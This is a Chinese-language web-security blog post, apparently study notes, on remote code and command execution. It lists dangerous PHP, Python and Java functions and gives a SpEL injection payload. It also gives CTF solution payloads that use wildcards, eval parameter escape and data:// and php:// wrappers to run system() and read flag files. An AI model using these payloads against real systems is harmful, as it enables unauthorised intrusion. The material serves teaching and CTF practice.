RCE&代码执行&命令执行&无回显方案&语言表达式&黑盒功能点&白盒方法名

Ethan医生2个月前WEB安全79


-RCE代码执行:引用脚本代码解析执行

-RCE命令执行:脚本调用操作系统命令

漏洞函数:

1.PHP:

PHP代码执行函数:

eval()assert()preg_replace()create_function()array_map()call_user_func()call_user_func_array()array_filter()uasort()、等

PHP命令执行函数:(在执行命令函数的时候可以指定目录../和命令所有可执行的操作用&管道去拼接操作命令)

system()exec()shell_exec()pcntl_exec()popen()proc_popen()passthru()、等

2.Python:

eval exec subprocess os.system commands等

3.Java:

Java中没有类似php中eval函数这种直接可以将字符串转化为代码执行的函数,但是有反射机制,并且有各种基于反射机制的表达式引擎,如: OGNL、SpEL、MVEL等.

 

#RCE-代码执行

功能点举例:在线编程

 

#RCE-命令执行

功能点举例:系统面板

 

#RCE-Java&PHP

SPEL:(功能点举例:评论解析)

comment=T(java.lang.Runtime).getRuntime().exec('calc')

 

#其他漏洞引发链

注入,文件包含,反序列化等引发

 

#有回显&无回显

1、直接写个文件访问查看

2、直接进行对外访问接受

 

#黑盒案例

代码在线运行平台测试

 

#白盒CTF

29-通配符

system('tac fla*.php');

30-取代函数&通配符&管道符

`cp fla*.ph* 2.txt`;

echo shell_exec('tac fla*.ph*');

31-参数逃逸

eval($_GET[1]);&1=system('tac flag.php');

32~36-配合包含&伪协议

include$_GET[a]?>&a=data://text/plain,<?=system('tac flag.php');?>

include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

37~39-包含RCE&伪协议&通配符

data://text/plain,<?php system('tac fla*');?>

php://input post:<?php system('tac flag.php');?>


标签: RCE

相关文章

XSS跨站&CSP策略&HttpOnly属性&Filter代码&符号标签&AI绕过&工具项目

#XSS跨站-输入输出-原理&分类&利用点漏洞原理:接受输入数据,输出显示数据后解析执行基础类型:反射(非持续),存储(持续),DOM-BASE拓展类型:jquery,mxss,uxs...

JAVA攻防-Shiro专题&有key无利用链&JRMP协议&CC1&CB1链分析&Transform执行链

#Shrio有key无链:JRMP指的是Java远程方法协议(Java Remote Method Protocol)。它是 Java 对象实现远程通信的基础技术,也是Java RMI(Remote...

Web攻防-访问控制篇&水平越权&垂直越权&未授权访问&级别架构&项目插件&SRC复盘

1、水平越权:同级别的用户之间权限的跨越2、垂直越权:低级别用户到高级别用户权限的跨越3、未授权访问:通过无级别用户能访问到需验证应用 实验:https://portswigger.net/...

SSRF服务端伪造&伪协议利玩法&域名及IP绕过&无回显利用&挖掘点&SRC复盘

SSRF服务端伪造&伪协议利玩法&域名及IP绕过&无回显利用&挖掘点&SRC复盘

#SSRF漏洞原理服务器端请求伪造,也称为SSRF(Server-Side Request Forgery),是因为前端用户可以输入任意URL到后端服务器,而且服务器也没有对其URL进行严格的过滤和校...

XSS跨站&Cookie盗取&数据包提交&网络钓鱼&BEEF项目&XSS平台&危害利用

#XSS跨站-输入输出-原理&分类&利用点漏洞原理:接受输入数据,输出显示数据后解析执行基础类型:反射(非持续),存储(持续),DOM-BASE拓展类型:jquery,mxss,uxs...

JAVA攻防-FastJson专题&各版本Gadget链&autoType开关&黑名单&依赖包&本地代码

#FastJson反序列化各版本利用链分析参考文章:https://xz.aliyun.com/news/14309参考文章:https://mp.weixin.qq.com/s/t8sjv0Zg8_...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。